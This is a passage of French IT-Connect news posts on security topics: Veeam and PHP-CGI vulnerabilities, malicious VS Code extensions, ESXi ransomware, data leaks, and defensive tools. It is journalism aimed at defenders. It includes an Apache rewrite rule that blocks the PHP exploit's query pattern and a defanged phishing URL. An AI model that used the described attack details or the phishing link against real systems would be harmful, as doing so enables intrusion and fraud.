Enfin, si vous voulez accéder à des cours et modules dédiés aux techniques offensives ou défensives et améliorer vos compétences en cybersécurité, je vous oriente vers Hack The Box Academy, utilisez ce lien d'inscription (je gagnerai quelques points ) : Tester Hack the Box Academy

The post Compromission Active Directory – Le cas de la Box Timelapse de Hack The Box first appeared on IT-Connect.

Vous utilisez Veeam Backup & Replication ainsi que Veeam Backup Enterprise Manager ? Sachez qu'un exploit PoC a été publié pour une faille de sécurité critique permettant à un attaquant d'outrepasser l'authentification. Faisons le point.

Pour rappel : Veeam Backup Enterprise Manager est une console Web de gestion et reporting pour la célèbre solution Veeam Backup & Replication. Elle offre l'avantage de permettre de gérer plusieurs instances Veeam à partir d'une console unique. Il est important de préciser qu'elle n'est pas activée par défaut, donc toutes les organisations ne sont pas exposées à ce risque de sécurité.

La faille de sécurité CVE-2024-29849 présente dans Veeam Backup Enterprise Manager a déjà été corrigée par Veeam puisqu'un bulletin de sécurité a été publié à son sujet le 21 mai 2024. Nous avions repris cette alerte de sécurité dans l'un de nos précédents articles pour vous avertir. Si vous n'avez pas encore fait le nécessaire pour vous protéger, il va être temps de passer à l'action : un exploit PoC a été publié pour cette vulnérabilité.

Un exploit PoC pour la CVE-2024-29849

Le chercheur en sécurité Sina Kheirkhah a mis en ligne un rapport technique au sujet de la faille de sécurité CVE-2024-29849. Ce rapport est accompagné par un exploit PoC publié sur son GitHub, et qui prend la forme d'un script Python.

Dans son rapport, il explique que la faille de sécurité se situe dans "Veeam.Backup.Enterprise.RestAPIService.exe" qui est en écoute sur le serveur, sur le port TCP 9398. D'un point de vue de l'application web principale, il agit comme un serveur API REST. L'exploitation consiste à envoyer un jeton de signature VMware (SSO) spécialement conçu au service vulnérable, en utilisant l'API de Veeam. Finalement, l'attaquant peut usurper l'identité d'un compte administrateur et accéder à l'application sans avoir besoin de s'authentifier.

Le rapport de Sina Kheirkhah est très détaillé et contient toutes les informations techniques nécessaires à la compréhension et l'exploitation de cette vulnérabilité.

Comment se protéger ?

La meilleure façon de se protéger, c'est d'installer le correctif de sécurité publié par Veeam. Le 21 mai 2024, l'éditeur américain a publié la version 12.1.2.172 pour corriger plusieurs vulnérabilités, dont celle-ci.

De plus, il semble judicieux de limiter à certaines adresses IP les accès à l'application sur le port TCP 9398, mais aussi d'activer le MFA sur l'ensemble des comptes de l'application. Enfin, si vous n'utilisez pas Veeam Backup Enterprise Manager, vous pouvez le désinstaller comme l'explique cette page de la documentation Veeam.

Source

The post Veeam Backup Enterprise Manager : un exploit PoC a été publié pour une faille de sécurité critique ! first appeared on IT-Connect.

La marketplace de Visual Studio Code est très utile pour ajouter des fonctionnalités à l'éditeur de code de Microsoft et le personnaliser, notamment avec des thèmes. Néanmoins, c'est aussi un nid à malwares : des chercheurs en sécurité ont identifié des milliers d'extensions malveillantes ! Faisons le point.

Pour rappel, Visual Studio Code est un éditeur de code gratuit et open source développé par Microsoft. Il prend en charge de nombreux langages, notamment PowerShell et Python, et il est très utilisé par les professionnels de l'IT.

Par l'intermédiaire de la marketplace pour Visual Studio Code, Microsoft distribue des extensions pour VSCode afin de lui ajouter des fonctionnalités et de personnaliser son apparence. Les membres de la communauté peuvent, eux aussi, publier du contenu sur cette marketplace : les cybercriminels l'ont bien compris et en profitent également.

Visual Studio Code et la menace du typosquatting

Récemment, trois chercheurs en sécurité israéliens, Amit Assaraf, Itay Kruk, et Idan Dardikman, ont mené une expérience. Ils ont créé une version malveillante du thème "Dracula Official", l'un des éléments de la marketplace les plus populaires (plus de 7 millions de téléchargements).

Ils ont repris le code d'origine de l'extension et ils ont ajouté un script supplémentaire pour collecter des informations sur le système de l'utilisateur. Les informations collectées sont envoyées sur un serveur via HTTPS. Leur version de ce thème ne s'appelle pas "Dracula Official" mais "Darcula Official" (subtile !) et elle reprend le même logo, ainsi que le domaine "darculatheme.com" qui ajoute de la crédibilité. Ils sont parvenus à publier cette extension sur la marketplace de Visual Studio Code.

24 heures plus tard, il y avait déjà plus de 100 installations, c'est-à-dire 100 ordinateurs qui pourraient potentiellement être compromis s'il y avait un réel code malveillant. "Nous avons remarqué qu'une victime avait été identifiée comme étant une machine Windows dans le domaine et le réseau d'une société cotée en bourse dont la capitalisation boursière s'élève à 483 milliards de dollars.", précise les chercheurs en sécurité.

Étant donné que Visual Studio Code est destiné à exécuter du code divers et variés, à exécuter des processus, etc... Il est difficile de déterminer si son activité est malveillante ou non.

À ce sujet, les chercheurs en sécurité apportent des précisions au sein de leur article disponible sur Medium : "Malheureusement, les outils traditionnels de sécurité des terminaux (EDR) ne détectent pas cette activité (comme nous l'avons montré pour certaines organisations dans le cadre du processus de divulgation responsable). VSCode est conçu pour lire de nombreux fichiers, exécuter de nombreuses commandes et créer des processus enfants, de sorte que les EDR ne peuvent pas déterminer si l'activité de VSCode est une activité de développeur légitime ou une extension malveillante."

Attention à la marketplace de Visual Studio Code

À l'aide d'un outil qu'ils ont développé, les trois chercheurs sont parvenus à analyser en profondeur le contenu publié sur la marketplace de Visual Studio Code. Ils sont parvenus à identifier :

• 1 283 extensions contenant des dépendances malveillantes connues, pour un total de 229 millions d'installations
• 87 extensions qui tentent de lire le fichier /etc/passwd sur le système hôte.
• 8161 extensions qui communiquent avec une adresse IP codée en dur à partir d'un code JS.
• 1 452 extensions qui exécutent un binaire exécutable inconnu ou une DLL sur la machine hôte.
• 267 extensions contiennent des secrets vérifiés codés en dur.
• Le code et les ressources de 145 extensions ont été signalés comme malveillant par VirusTotal.
• 2 304 extensions qui utilisent le dépôt Github d'un autre éditeur comme dépôt officiel, ce qui implique des extensions copiées.

Des chiffres alarmants et qui montrent qu'il faut être vigilant avant d'installer une extension sur sa machine. Il est temps que Microsoft améliore son processus de validation et effectue un nettoyage sur cette marketplace... En attendant, l'outil d'analyse des chercheurs en sécurité devrait être publié dans les prochaines semaines.

Finalement, l'ensemble des marketplaces et plateformes de dépôts officielles peuvent être utilisées pour distribuer des logiciels malveillants : PyPI pour les projets Python, Docker Hub pour les images de conteneurs, ou encore le catalogue de Visual Studio Code sont des exemples parmi d'autres....

Source

The post La Marketplace de Visual Studio Code est truffée d’extensions malveillantes installées par millions ! first appeared on IT-Connect.

Une nouvelle faille de sécurité critique a été découverte dans PHP : CVE-2024-4577 ! En l'exploitant, un attaquant peut exécuter du code malveillant à distance sur le serveur Windows utilisé en tant que serveur Web. Faisons le point sur cette menace.

L'équipe de développement de PHP a corrigé plusieurs failles de sécurité dans son moteur de scripts PHP. L'une de ces vulnérabilités, associées à la référence CVE-2024-4577 mérite une attention particulière.

Découverte par le chercheur en sécurité Orange Tsai de DEVCORE, cette vulnérabilité d'injection d'arguments dans CGI affecte toutes les versions de PHP lorsque ce dernier est installé sur un serveur Windows. Pour être plus précis, toutes les versions de PHP, de 5.X à la dernière version 8.3.X sont vulnérables. Le problème, c'est que de nombreuses versions vulnérables ne sont plus prises en charge et ne pourront pas bénéficier d'un correctif de sécurité.

"Lors de l'implémentation de PHP, l'équipe n'a pas remarqué la fonctionnalité Best-Fit de conversion d'encodage dans le système d'exploitation Windows. Cette omission permet à des attaquants non authentifiés de contourner la protection précédente de CVE-2012-1823 par des séquences de caractères spécifiques.", précise le chercheur en sécurité dans son rapport.

Vous l'aurez compris, cette nouvelle vulnérabilité permet d'outrepasser un correctif de sécurité introduit il y a plus de 10 ans pour corriger la faille de sécurité CVE-2012-1823 présente dans PHP-CGI. En exploitant cette vulnérabilité, un attaquant peut compromettre le serveur Web.

Qui est vulnérabilité à cette faille de sécurité ?

Au-delà de la version de PHP utilisée, pour être vulnérable à la faille de sécurité CVE-2024-4577, le moteur de scripts PHP doit être utilisé sur Windows. L'article évoque un cas d'utilisation de PHP avec un serveur Web XAMPP sous Windows, mais ce n'est pas le seul moyen d'utiliser PHP-CGI sur Windows. En effet, il est tout à fait possible d'avoir un serveur IIS avec PHP-CGI actif, et dans ce cas, le serveur Web est également vulnérable. Nous pourrions aussi citer WAMP.

De plus, bien que cette vulnérabilité soit liée à PHP-CGI, elle peut être exploitée même si PHP n'est pas configuré en mode CGI. La seule condition, c'est que les exécutables PHP ("php.exe" ou "php-cgi.exe") soient stockés dans des répertoires accessibles par le serveur web. Ceci est la configuration par défaut de XAMPP, donc il y a probablement une grande majorité de serveurs XAMPP vulnérables.

Ce problème de sécurité est exploitable lorsque l'une de ces "locales" est utilisée dans la configuration de PHP : chinois traditionnel, chinois simplifié et japonais. Attention, les autres "locales" sont potentiellement vulnérables : Orange Tsai affirme qu'il n'a pas évalué toutes les configurations possibles.

Remarque : CGI pour Common Gateway Interface, est une interface utilisée sur les serveurs Web pour permettre l'exécution de programmes externes via des requêtes HTTP. Ceci est notamment utile au bon fonctionnement de certaines applications.

Comment se protéger de la CVE-2024-4577 ?

Le meilleur moyen de se protéger de cette vulnérabilité, c'est de passer sur les dernières de PHP, publiées il y a quelques jours, car elles contiennent un correctif. Il s'agit des versions suivantes : PHP 8.3.8, PHP 8.2.20, et PHP 8.1.29.

Si vous ne pouvez pas mettre à jour PHP maintenant, ou que vous utilisez une version de PHP qui n'est plus supportée, il existe une solution. En effet, une règle de réécriture d'URL basée sur l'utilisation du module PHP "mod_rewrite" permet de bloquer les attaques (mais ceci s'appliquerait uniquement aux locales évoquées ci-dessus).

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? – [F,L]

Par ailleurs, à la place de cette règle, si vous êtes certain que vous n'utilisez pas PHP-CGI et que vous utilisez XAMPP, vous pouvez désactiver la fonctionnalité sur votre serveur Web. Éditez le fichier suivant :

C:/xampp/apache/conf/extra/httpd-xampp.conf

Puis, commentez la ligne présentée ci-dessous en ajoutant un "#" au début de la ligne :

#ScriptAlias /php-cgi/ "C:/xampp/php/"

Enfin, sachez qu'un exploit PoC est déjà disponible (voir cette page). Cette vulnérabilité représente un risque important, donc mettez à jour si vous le pouvez.

Source

The post Cette faille de sécurité critique dans PHP fait trembler les serveurs Web sous Windows first appeared on IT-Connect.

Le FBI continue sa lutte contre le gang de ransomware LockBit et ses affiliés : les autorités américaines auraient en leur possession pas moins de 7 000 clés de déchiffrement de LockBit 3.0. Si vous avez été victime de ce ransomware, vous êtes invité à prendre contact avec le FBI...

La bonne nouvelle du jour est probablement est liée à l'opération Cronos menée par les forces de l'ordre de 11 pays en février 2024. D'ailleurs, lors de cette opération importante, les autorités étaient parvenues à mettre la main sur 34 serveurs de l'infrastructure LockBit ainsi qu'à des clés de chiffrement (1000 dans un premier temps, puis environ 2500 au total). Désormais, le FBI détiendrait une quantité beaucoup plus importante de clé de déchiffrement...

En effet, à l'occasion d'une conférence sur la cybersécurité organisée à Boston aux États-Unis, Bryan Vorndan, a dévoilé que le FBI détenait 7 000 clés de déchiffrement pouvant profiter aux victimes du ransomware LockBit 3.0 : "En outre, grâce à la perturbation continue de LockBit, nous disposons désormais de plus de 7 000 clés de déchiffrement et nous pouvons aider les victimes à récupérer leurs données et à se remettre en ligne.", peut-on lire. La transcription de son allocution est disponible sur cette page.

Désormais, le message du FBI est clair : si vous avez été victime de LockBit, vous devez entrer en contact avec les autorités, car une clé de déchiffrement est sûrement disponible pour vous permettre de déchiffrer vos données gratuitement. "Nous nous adressons aux victimes connues de LockBit et encourageons toute personne qui pense en avoir été victime à se rendre sur le site de l'Internet Crime Complaint Center, à l'adresse ic3.gov.", a précisé Bryan Vorndan du FBI.

Finalement, malgré tous les efforts des forces de l'ordre, et l'identification récente de LockBitSupp, l'un des leaders du gang de ransomware LockBit, ce groupe de cybercriminels reste toujours très actif et redoutable. Espérons que de nombreuses victimes puissent bénéficier de ces clés de déchiffrement.

Source

The post Ransomware LockBit 3.0 : le FBI détient 7 000 clés de déchiffrement ! first appeared on IT-Connect.

À partir d'aujourd'hui, jeudi 6 juin 2024, le portail Orange Cybersecure est accessible à tout le monde ! Son objectif : vous permettre de vérifier facilement et rapidement les liens douteux que vous êtes susceptible de recevoir par e-mail ou SMS.

Avec la solution Orange Cybersecure, les français vont pouvoir vérifier si un lien ("URL") est dangereux ou non. Pour mettre au point cet outil, Orange s'est appuyé sur l'expertise de sa filiale Orange Cyberdefense, spécialisée dans la cybersécurité.

"Sur le portail Cybersecure, toute personne, quel que soit son opérateur, pourra vérifier, gratuitement, par un simple copier/coller, la légitimité d’un site, d’un lien, d’un email ou d’un SMS qui lui semble suspect.", peut-on lire dans le communiqué de presse d'Orange.

Le principe est simple : vous copiez-coller le lien à vérifier, et s'il est déjà connu par la base de données du service, alors la réponse est immédiate. Sinon, cela implique une analyse de la part des experts d'Orange Cyberdefense avant d'avoir une réponse. Ce service sera connecté à une intelligence artificielle capable d'apprendre au fur et à mesure que la base est enrichie par les utilisateurs.

"Comme une application communautaire, plus le moteur est utilisé plus la base de données s’enrichit au bénéfice de tous les français.", précise Orange. Ce service participatif me fait penser au service Waze où les automobilistes peuvent signaler des événements, bien que ce soit dans un tout autre registre.

L'accès à ce service en ligne sera gratuit, bien qu'Orange prévoit une offre payante pour ses clients Orange et Sosh.

Une offre payante pour les clients Orange et Sosh

Le pack Orange Cybersecure est proposé pour ceux qui veulent une solution de protection plus complète. Proposé à 7 euros par mois et sans engagement, cet abonnement intègre la solution de sécurité Orange Cybersecure pour lutter "contre les messages malveillants comme les arnaques sur internet, virus, sites frauduleux, usurpation d’identité etc.", précise Orange qui présente sa solution comme étant plus qu'un simple antivirus.

Un seul abonnement peut être utilisé pour protéger jusqu'à 10 appareils d'un même foyer : tablette, ordinateur, smartphone. Cette offre donne aussi accès à un accompagnement où l'utilisateur peut solliciter l'aide des spécialistes Cyber d'Orange en cas de doute.

"Des spécialistes Cyber qui répondent et les accompagnent 7 jours sur 7 en cas de doute sur la fiabilité d’un site ou d’une application, de piratage de données, de fraude avérée, une aide à l’installation ou toutes autres questions.", peut-on lire.

Après avoir conquis les entreprises, Orange souhaite séduire les particuliers avec sa filiale Orange Cyberdefense. Cette nouvelle offre Cybersecure est lancée en France pour le moment, mais elle devrait être lancée en Europe par la suite, de façon progressive.

Pour tester ce nouveau service, rendez-vous sur cette page :

• Orange Cybersecure - Service en ligne

Comment vérifier si un lien est malveillant avec Orange Cybersecure ?

Comme le montre l'image ci-dessous, il suffit de se rendre sur le portail Orange Cybersecure, de copier-coller le lien à vérifier puis d'appuyer sur le bouton "Vérifier la fiabilité". Après avoir vérifié un captcha, le verdict tombe !

J'ai fait un test avec le lien suivant, associé à un e-mail de phishing aux couleurs du Crédit Mutuel et que j'ai reçu hier midi.

[https://]tracking-clientprofessionel[.]com/S4FD5sf

Voici l'e-mail en question :

Le portail Orange Cybersecure m'indique, qu'en effet, il s'agit bien d'un lien malveillant. À noter également la source "avis fourni par Google", qui laisse entendre que ce lien a déjà été reporté par d'autres utilisateurs.

J'ai fait un autre test avec le texte d'un e-mail ne contenant pas de liens, mais une pièce jointe malveillante, et le portail m'a retourné une erreur.

En complément, le portail donne accès à différents guides et articles pour accompagner les internautes afin de les sensibiliser et les former aux risques de la cybersécurité. Orange semble même également proposer des ateliers en ligne, accessible sur inscription. Par exemple, il y a un atelier nommé "Atelier : Eviter les arnaques en ligne - atelier en ligne".

Qu'en pensez-vous ?

The post Phishing : vérifiez les liens douteux avec le portail Orange Cybersecure first appeared on IT-Connect.

L'Offensive Security a publié la deuxième version de l'année 2024 de sa distribution Kali Linux ! L'occasion de faire le point sur les changements apportés à Kali Linux 2024.2, ainsi que sur les 18 nouveaux outils !

• Kali Linux 2024.1 est disponible ! Quelles sont les nouveautés ?

Le bug de l'an 2038

Le bug de l'an 2038 a été corrigé dans Kali Linux ! Il s'agit d'un problème similaire au bug de l'an 2000 qui affecte les systèmes informatiques qui comptent le temps en secondes depuis le 1er janvier 1970. C'est notamment le cas de différents systèmes d'exploitation et logiciels, dont les systèmes Linux.

Ce bug doit se déclencher le 19 janvier 2038 à 3 heures 14 minutes et 8 secondes, et à ce moment-là, les systèmes affectés par le bug considéreront alors être le 13 décembre 1901 à 20 heures 45 minutes et 52 secondes. Un retour en arrière brutal et problématique, bien entendu.

Ceci est appelé la transition "t64" : "Pour éviter le problème de l'an 2038, la taille du type time_t a dû être modifiée pour être de 64 bits sur les architectures où elle était de 32 bits.", peut-on lire sur le site de Kali Linux.

Les nouveaux outils de Kali Linux 2024.2

Cette nouvelle version est très riche en nouveaux outils, puisqu'il y a eu 18 nouveaux outils ajoutés à la distribution Kali Linux 2024.2.

Voici la liste de ces outils :

• autorecon - Outil de reconnaissance réseau multi-thread, pour énumérer les services.
• coercer - Un script Python pour forcer un serveur Windows à s'authentifier sur une machine arbitraire.
• dploot - Réécriture en Python de SharpDPAPI.
• getsploit - Utilitaire en ligne de commande pour rechercher et télécharger des exploits.
• gowitness - Utilitaire de capture d'écran web utilisant Chrome Headless, écrit en Golang.
• horst - Outil de balayage radio pour le Wi-Fi.
• ligolo-ng - Outil de tunneling/pivoting avancé et utilisant une interface TUN.
• mitm6 - Pwning IPv4 via IPv6 (réponse aux messages DHCPv6).
• netexec - Outil d'exploitation de services réseau aidant à évaluer la sécurité des grands réseaux.
• pspy - Surveiller les processus Linux sans permissions root.
• pyinstaller - Compile les programmes Python en exécutables autonomes.
• pyinstxtractor - Extracteur PyInstaller.
• sharpshooter - Framework de génération de payload.
• sickle - Outil de développement de payload.
• snort - Système de détection d'intrusion réseau.
• sploitscan - Rechercher des informations sur les CVE, à partir de plusieurs bases officielles.
• vopono - Exécuter des applications via des tunnels VPN avec des espaces de noms réseau temporaires.
• waybackpy - Accéder à l'API de la Wayback Machine en utilisant Python.

Enfin, l'équipe de Kali Linux a mis à jour les environnements de bureau Xfce et GNOME. Ceci se traduit par le passage à GNOME 46, ainsi qu'une mise à jour de Xfce particulièrement pour les modes Kali-Undercover et HiDPI.

Pour obtenir des informations supplémentaires, consultez l'annonce officielle sur le site de Kali.

The post Kali Linux 2024.2 : 18 nouveaux outils et correction du bug de l’an 2038 first appeared on IT-Connect.

Les environnements VMware ESXi sont pris pour cible par une nouvelle variante du ransomware TargetCompany, qui vient s'ajouter à la liste des menaces capables de chiffrer les VM des hyperviseurs de VMware. Faisons le point.

Le ransomware TargetCompany, aussi connu sous les noms de Mallox, FARGO et Tohnichi, a été repéré pour la première fois en juin 2021. Dans un premier temps, il a surtout été utilisé pour mener des attaques contre les serveurs de gestion de base de données, que ce soit MySQL, SQL Server ou encore Oracle, en Corée du Sud, en Thaïlande, en Inde et à Taïwan.

Puis, en février 2022, Avast a publié un outil de déchiffrement pour TargetCompany afin d'aider les victimes de ce ransomware à récupérer leurs données gratuitement. Malgré ce coup porté par Avast, le gang de ransomware TargetCompany est rapidement revenu sur le devant de la scène... Notamment en s'attaquant aux serveurs Windows.

Mais, désormais, Trend Micro nous apprend qu'une nouvelle variante de TargetCompany pour Linux cible particulièrement les hyperviseurs VMware ESXi.

VMware ESXi dans le viseur du ransomware TargetCompany

C'est par l'intermédiaire d'un script shell exécuté sur l'hôte compromis que le logiciel malveillant effectue un ensemble de vérifications, pour déterminer sur quel environnement il se situe. Il cherche à déterminer s'il s'exécute sur un serveur VMware ESXi grâce à l'exécution de la commande "uname" à la recherche du mot clé "vmkernel".

"Le groupe de ransomwares TargetCompany emploie désormais une nouvelle variante Linux qui utilise un script shell personnalisé comme moyen de diffusion et d'exécution de la charge utile, une technique que l'on ne retrouvait pas dans les variantes précédentes.", précise Trend Micro dans son rapport.

En complément, il génère un fichier nommé "TargetInfo.txt" qui recense des informations sur la victime telles que le nom d'hôte, l'adresse IP, l'OS du serveur, l'utilisateur utilisé par le malware, etc.... Et ce fichier est envoyé vers le serveur C2 des attaquants.

S'il est exécuté sur un hyperviseur VMware ESXi, le ransomware passe à l'action dans le but de chiffrer les machines virtuelles. TargetCompany chiffre tous les fichiers relatifs aux machines virtuelles : VMDK, VMEM, VSWP, VMX, VMSN, NVRAM. Les fichiers chiffrés héritent de l'extension ".locked".

Enfin, une demande de rançon nommée "HOW TO DECRYPT.txt" est déposée sur le serveur et le malware termine en supprimant ses traces pour rendre plus difficile les futures investigations. "Une fois que le ransomware a exécuté sa routine, le script supprime la charge utile TargetCompany à l'aide de la commande "rm -f x".", précise Trend Micro.

Consultez le rapport de Trend Micro pour obtenir des détails supplémentaires, notamment les indicateurs de compromission et les URL utilisées par les attaquants.

Source

The post Une nouvelle variante Linux du ransomware TargetCompany cible VMware ESXi ! first appeared on IT-Connect.

L'enseigne de prêt-à-porter française Zadig & Voltaire est victime d'une importante fuite de données : un cybercriminel a publié une base de données avec les données personnelles de plus de 600 000 clients. Faisons le point.

Rappel - Créée en 1997, Zadig & Voltaire est une marque française de prêt-à-porter, aussi bien pour les femmes que pour les hommes.

Ce mercredi 5 juin, au petit matin, un cybercriminel a publié sur un forum de hacking une base de données appartenant à l'enseigne de prêt-à-porter Zadig & Voltaire. Il s'agit de données publiées sur BreachForums, la principale "place de marché" pour l'achat et la revente de données issues de cyberattaques. Preuve que BreachForums est bien de retour après avoir été malmené par les forces de l'ordre ces dernières semaines.

Cette fuite de données contient les données personnelles de 638 726 clients de l'enseigne française. Selon les informations fournies par le cybercriminel à l'origine de la divulgation des données, ces données auraient été volées en novembre 2023. Ceci laisse entendre que la cyberattaque s'est déroulée dans les jours ou semaines précédant le vol de données.

À quoi correspondent ces données personnelles ?

Dans cette base de données, nous retrouvons diverses informations au sujet des clients de Zadig & Voltaire, notamment des noms et prénoms, des adresses e-mails, des numéros de téléphone, des adresses postales, ainsi que des dates de naissance. C'est typiquement le genre d'informations que l'on retrouve dans un fichier client.

Si vous êtes client de Zadig & Voltaire, nous vous recommandons de modifier le mot de passe de votre compte client, par précaution. Méfiez-vous également des e-mails que vous recevez, car une campagne de phishing pourrait être organisée à partir de ces informations.

En 2024, ce n'est pas la première enseigne de prêt-à-porter à subir une cyberattaque associée à une fuite de données. En avril 2024, c'est la marque "Le Slip français" qui a été victime d'un incident similaire. Un peu plus tôt dans l'année, c'était au tour d'une filiale de l'enseigne Benetton.

Source

The post Cyberattaque Zadig & Voltaire : les données personnelles de 600 000 clients publiées sur le Dark Web first appeared on IT-Connect.

Un nouvel ensemble de 361 millions d'adresses e-mails a été ajouté au service en ligne Have I Been Pwned ! De quoi vous permettre de vérifier si vos identifiants sont présents dans cette liste d'informations collectées à partir de canaux Telegram. Faisons le point.

Un chercheur en sécurité anonyme a transféré à Troy Hunt, le créateur du site Have I Been Pwned (HIBP), un ensemble de fichiers représentants 122 Go de données. Cet ensemble de données correspond à plus de 1 700 fichiers provenant de 518 canaux Telegram différents. Il s'agit d'une action de scraping ("moissonnage") effectuée par ce chercheur en sécurité.

Au total, ces fichiers contiennent pas moins de 361 millions d'adresses e-mails uniques, dont 151 millions d'adresses e-mails ajoutées pour la première fois sur le site Have I Been Pwned !

À quoi correspondent ces identifiants ? Sont-ils légitimes ?

Ces identifiants peuvent provenir d'une fuite de données suite à une intrusion sur un système par un cybercriminel, à la collecte d'identifiants effectuée par un malware infostealer, à du credential stuffing, etc... Ce qui est certain, c'est que ces identifiants circulent sur des canaux cybercriminels de Telegram. Les pirates n'hésitent pas à divulguer ces identifiants pour accroître leur popularité.

Les données comprennent des identifiants de connexion regroupés par service (par exemple, Gmail, Yahoo, etc.) ou par pays. Aucun site ou service n'est susceptible d'être épargné, notamment s'il s'agit d'un infostealer qui a exfiltré les mots de passe enregistrés dans un navigateur Web.

Tous les fichiers correspondant à cette fuite de 361 millions d'identifiants ne sont pas structurés de la même façon. Il y a des combinaisons d'adresse e-mail et de mot de passe, tandis que d'autres fichiers intègrent l'URL du service en plus de l'adresse e-mail et du mot de passe ! Certains fichiers contiennent des dizaines de millions de lignes.

Troy Hunt a passé du temps à analyser ces données, notamment pour déterminer si elles sont légitimes, bien qu'il soit impossible de vérifier l'ensemble des identifiants.

Le résultat est clair : de nombreuses adresses e-mails présentes concernées par une fuite sont correctement associées au site web mentionné dans les fichiers de données fournit par le chercheur en sécurité. Autrement dit, les identifiants distribués sur ces canaux Telegram sont légitimes, au moins pour une partie.

Pour en savoir plus, vous pouvez consulter l'article publié par Troy Hunt. Pour vérifier si vous êtes affecté, rendez-vous sur le service de vérification HIBP.

Source

The post 361 millions de comptes volés divulgués sur Telegram ! Êtes-vous concerné ? first appeared on IT-Connect.

Kaspersky a publié un nouvel outil gratuit pour analyser les systèmes Linux à la recherche de cybermenaces connues ! Le nom de cet outil : Kaspersky Virus Removal Tool (KVRT). Faisons le point.

Disponible depuis plusieurs années, l'outil Kaspersky Virus Removal Tool était jusqu'alors réservé aux utilisateurs de Windows. L'éditeur Kaspersky a pris la décision de développer une version pour Linux, désormais disponible.

Kaspersky estime que les entreprises ne protègent pas suffisamment leurs machines sous Linux, pensant qu'elles sont immunisées contre les menaces lorsqu'une machine est exécutée avec une distribution Linux. "C'est pourquoi nous avons lancé un produit gratuit dédié qui permet de vérifier les ordinateurs Linux contre les menaces modernes : Kaspersky Virus Removal Tool (KVRT) pour Linux.", peut-on lire sur le site de Kaspersky.

À quoi sert Kaspersky Virus Removal Tool pour Linux ?

Ce nouvel outil ne surveille pas le système en temps réel, mais il est plutôt là pour effectuer une analyse sur une machine à la recherche de menaces déjà présentes. Autrement dit, il sert à effectuer une recherche de logiciels malveillants sur Linux, tout en proposant le nettoyage des menaces détectées. "Il peut détecter à la fois les logiciels malveillants et les adwares, ainsi que les programmes légitimes pouvant être utilisés pour des attaques.", précise Kaspersky.

Pour rechercher les menaces, Kaspersky Virus Removal Tool effectue une analyse en profondeur du système puisqu'il va s'intéresser à tous les fichiers du système, mais pas seulement. Kaspersky apporte des précisions à ce sujet : "Notre application peut analyser la mémoire système, les objets de démarrage, les secteurs d'amorçage et tous les fichiers du système d'exploitation à la recherche de logiciels malveillants connus. Elle analyse les fichiers de tous les formats, y compris ceux archivés."

Comment utiliser Kaspersky Virus Removal Tool sur Linux ?

Cet outil est compatible avec différentes distributions Linux, dont Debian, AlmaLinux, Oracle Linux, Ubuntu, ou encore Red Hat Enterprise Linux. La liste complète des distributions disponibles et des prérequis est disponible sur cette page.

Il doit être téléchargé et exécuté depuis la machine sur laquelle l'analyse doit être effectuée. Kaspersky explique qu'il s'agit d'une application portable, qui ne nécessite pas d'installation. Il est également précisé que la base de l'application n'est pas mise à jour de façon automatique : il convient de télécharger la dernière version, pour détecter les menaces les plus récentes, directement depuis le site de l'éditeur.

Cette application est adaptée aux machines Linux avec ou sans interface graphique : "L'application peut être exécutée via une interface graphique ou via une ligne de commande. Mais vous ne pouvez la lancer que manuellement — il est impossible de configurer une analyse programmée.", peut-on lire.

Enfin, pour bénéficier d'une analyse complète du système, il est recommandé de lancer l'outil à partir du compte "root" ou d'un compte privilégié (via "sudo"). Sinon, l'outil pourrait passer à côté de certaines menaces s'il ne peut pas analyser certaines parties de la machine à cause d'un manque de permissions.

Pour en savoir plus, vous pouvez consulter cette page, tandis que le téléchargement s'effectue à partir de cette page en cliquant sur le lien "Show other platforms".

Qu'en pensez-vous ?

The post Kaspersky lance un outil gratuit pour analyser Linux à la recherche de menaces connues ! first appeared on IT-Connect.

Montrer que les ransomwares ne sont pas invincibles, voilà la devise de l'outil open source RansomLord ! Cet outil de cybersécurité est capable de détecter et de neutraliser les ransomwares avant même que les données ne soient chiffrées ! Comment est-ce possible ? Voici ce qu'il faut savoir !

Développé par John Page alias "hyp3rlinx", RansomLord est un outil ingénieux et innovant qui a pour objectif de venir court-circuiter le processus de chiffrement de nombreux ransomwares, y compris les plus redoutables. Ce nouvel outil anti-ransomware disponible sur GitHub est une nouvelle arme à disposition des entreprises et des particuliers dans la lutte contre les ransomwares ! Lors d'une attaque, le ransomware est neutralisé avant même de pouvoir chiffrer les données grâce au piège tendu par RansomLord.

Pour cela, RansomLord se présente comme une solution proactive pour faire face aux ransomwares. En effet, il va venir interférer avec le ransomware lors du processus de "pre-encryption" lorsque la menace va chercher à charger des bibliothèques (DLL) sur le système Windows. Il crée ses propres versions de DLL, que le ransomware va charger, et il va ainsi pouvoir mettre fin à l'exécution du ransomware grâce à un code spécial intégré dans les DLL de RansomLord. Autrement dit, il utilise la technique de "DLL hijacking", parfois elle-même utilisée par les cybercriminels !

La version 3.1 de RansomLord, publiée il y a quelques jours, est capable de mettre fin au processus de nombreux ransomwares, dont : LockBit, WannaCry, HelloKitty, BlackCat (ALPHV), Royal, ainsi que d'autres moins connus tels que StopCrypt, RisePro, RuRansom, ou encore MoneyMessage.

"RansomLord intercepte désormais les ransomwares testés par 49 groupes de menaces différents et y met fin.", peut-on lire sur le GitHub officiel. Grâce à des mises à jour régulières, l'auteur ajoute la prise en charge de nouveaux ransomwares.

• Télécharger RansomLord

Depuis plusieurs années, les ransomwares représentent une menace croissante pour les entreprises et les particuliers. D'ailleurs, le dernier rapport sur les menaces publié par Red Canary indique que les ransomwares sont la principale menace de ces derniers mois.

Source

The post RansomLord, un outil open source capable de piéger les ransomwares ! first appeared on IT-Connect.

VirtualGHOST, c'est le nom d'un nouvel outil publié par CrowdStrike dont l'objectif de mettre en évidence ce que l'on pourrait appeler des machines virtuelles fantômes, cachées sur les hôtes VMware ESXi. Leur présence fait suite à une intrusion par un attaquant. Faisons le point !

À plusieurs reprises, les équipes de CrowdStrike ont identifié des machines virtuelles suspectes sur des infrastructures VMware. Suspectes, car il s'agit de machines virtuelles cachées, en cours d'exécution, et invisibles à partir de l'interface utilisateur utilisée pour administrer la plateforme VMware.

Autrement dit, la VM créée par les attaquants n'apparaît pas dans l'inventaire de VMware ESXi, ni dans celui du vCenter. Pour démarrer la machine virtuelle de façon discrète, l'attaquant doit opérer à partir de la ligne de commande d'un hyperviseur ESXi compromis. En réponse à cette nouvelle technique émergente, l'entreprise américaine CrowdStrike a développé un outil de détection nommé VirtualGHOST ! C'est d'ailleurs le surnom donné par CrowdStrike à ces fameuses machines virtuelles.

